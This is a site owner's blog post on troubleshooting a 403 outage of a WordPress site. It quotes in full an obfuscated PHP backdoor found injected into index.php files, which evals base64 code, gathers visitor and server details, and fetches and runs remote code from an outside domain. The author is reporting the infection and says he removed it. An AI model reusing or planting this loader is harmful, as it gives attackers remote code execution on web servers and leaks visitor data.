Sanjeev Sabhlok's notes on technology, hardware, gardening

403 error sabhlokcity main wordpress down >You don’t have permission to access / on this server.

This is deplorable. Total breakdown of sabhlokcity.com. Site is down for six hours (based on pingdom notice). I've disabled htaccess/ plugins. There was some rubbish code in index.php which I've deleted, but still not back.

Forbidden

You don't have permission to access / on this server.

Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.

INDEX.PHP

All index.php files have the following code (not just sabhlokcity.com)

<?php
//codebegin3v
    $c=array();$c[1]=chr(97);$c[2]=chr(116);$c[3]=chr(115);$c[4]=chr(101);$c[5]=chr(114);$d=$c[97-96].$c[98-95].$c[33-30].$c[16-12].$c[55-50].$c[300-298];$g="";
    $e="ZnVuY3Rpb24gdnNwaWRlcl9nZXQoJHVybCwkdXNlcl9hZ2VudCA9ICJNb3ppbGxhLzUuMCAoY29tcGF0aWJsZTsgR29vZ2xlYm90LzIuMTsgK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbCkiKQp7IAogICAgJGNoMiA9IGN1cmxfaW5pdCgpOwogICAgY3VybF9zZXRvcHQoJGNoMiwgQ1VSTE9QVF9IVFRQSEVBREVSLCBhcnJheSgKCSAgICAnQWNjZXB0JyA9PiAnKi8qJywKCSAgICAnQWNjZXB0LUNoYXJzZXQnID0+ICdVVEYtOCwqO3E9MC41JywKCSAgICAnQWNjZXB0LUVuY29kaW5nJyA9PiAnZ3ppcCxkZWZsYXRlLHNkY2gnLAoJICAgICdBY2NlcHQtTGFuZ3VhZ2UnID0+ICdtb21vJywKCSAgICAnQ29ubmVjdGlvbicgPT4gJ2tlZXAtYWxpdmUnLAoJICAgICdVc2VyLUFnZW50JyA9PiAkdXNlcl9hZ2VudAoJCSkpOwogICAgY3VybF9zZXRvcHQoJGNoMiwgQ1VSTE9QVF9VUkwsICR1cmwpOyAKICAgIGN1cmxfc2V0b3B0KCRjaDIsIENVUkxPUFRfSEVBREVSLCBmYWxzZSk7IAogICAgY3VybF9zZXRvcHQoJGNoMiwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7ICAKCWN1cmxfc2V0b3B0KCRjaDIsIENVUkxPUFRfVVNFUkFHRU5ULCR1c2VyX2FnZW50KTsKICAgICR0ZW1wPWN1cmxfZXhlYygkY2gyKTsKCXJldHVybiAkdGVtcDsgCn0KJHJlZj0iIjsKaWYoaXNzZXQoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSkKCSRyZWY9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokYWNfbGFuZyA9ICcnOwppZihpc3NldCgkX1NFUlZFUlsnSFRUUF9BQ0NFUFRfTEFOR1VBR0UnXSkpCgkkYWNfbGFuZyA9ICRfU0VSVkVSWydIVFRQX0FDQ0VQVF9MQU5HVUFHRSddOwokcGF0aCA9ICcnOwokcGF0aD1nZXRjd2QoKTsKJGFnZW50ID0gJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10uInwiLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiJ8Ii4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXS4ifCIuJHJlZi4ifCIuJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLiJ8Ii4kYWNfbGFuZy4ifCIuJHBhdGguInwzdiI7Cg==";
    $f="e".$g."v".$g."a".$g."l".$g."(".$g."b".$g."a".$g."s".$g."e".$g."6".$g."4".$g."_".$g."d".$g."e".$g."c".$g."o".$g."d".$g."e(\"".$e."\"));";
    @$d($f);
    $e = vspider_get("http://utfall.pw/code/".str_ireplace('www.','',strtolower($_SERVER[‘SERVER_NAME’]))."/default.txt",$agent);
if(strlen($e)>20)
{
    if(strstr(base64_decode($e), "undermomocontrol") !== false)
    {        
        $f="e".$g."v".$g."a".$g."l".$g."(".$g."b".$g."a".$g."s".$g."e".$g."6".$g."4".$g."_".$g."d".$g."e".$g."c".$g."o".$g."d".$g."e(\"".$e."\"));";
        @$d($f);
    }
}
//codeend
?>

SCAN 

Tty to scan: https://sitecheck.sucuri.net/results/sabhlokcity.com

Can't do it, since the scan can't get to the website.

CHECK WITH SSH

http://wiki.dreamhost.com/Advanced_Troubleshooting_Techniques#Site_loads_immediately.2C_but_displays_a_403_Forbidden_Error

CHECK ROOT DIRECTORY

Found the problem

Somehow (someone might have done it) the .htaccess file in the root directory (i.e. above sabhlokcity.com directory) had "deny from all".
 
I changed to htaccess1 and everything came back.
 
Don't know who could have had access to the root directory. Maybe dreamhost?
Print Friendly, PDF & Email

sabhlok

View more posts from this author

Leave a Reply

Your email address will not be published. Required fields are marked *